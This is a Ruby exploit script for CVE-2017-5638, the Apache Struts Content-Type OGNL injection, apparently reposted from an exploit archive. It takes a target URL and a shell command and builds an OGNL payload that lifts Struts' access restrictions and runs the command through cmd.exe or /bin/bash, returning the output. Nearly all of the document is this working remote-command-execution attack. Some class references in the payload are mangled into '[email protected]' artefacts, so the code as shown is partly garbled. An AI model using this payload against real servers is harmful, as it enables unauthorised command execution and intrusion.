require 'typhoeus'
 #HatBash BR 
#http://hatbashbr.com/
#https://github.com/hatbashbr
#gem install typhoeus
#Mateus Lino a.k.a Dctor | Everton a.k.a Xguardian | 
 #CVE - 2017-5638

 
 puts "Insert URL: "
 target = gets.chomp
 puts "Insert Command. Exemple: ls"
 command = gets.chomp

cmd = command.each{|i| i}.join(" ")

payload = []
    payload << "%{(#_='multipart/form-data')."
    payload << "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload << "(#_memberAccess?"
    payload << "(#_memberAccess=#dm):"
    payload << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload << "(#ognlUtil=#container.getInstance(@[email protected]))."
    payload << "(#ognlUtil.getExcludedPackageNames().clear())."
    payload << "(#ognlUtil.getExcludedClasses().clear())."
    payload << "(#context.setMemberAccess(#dm))))."
    payload << "(#cmd='"
    payload << cmd.to_s
    payload << "')."
    payload << "(#iswin=(@[email protected]('os.name').toLowerCase().contains('win')))."
    payload << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload << "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload << "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload << "(#ros=(@[email protected]().getOutputStream()))."
    payload << "(@[email protected](#process.getInputStream(),#ros))."
    payload << "(#ros.flush())}"
    
request = Typhoeus.get(target, headers: {'User-Agent'=>'Mozilla/5','Content-Type'=> payload.join})
puts request.body

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.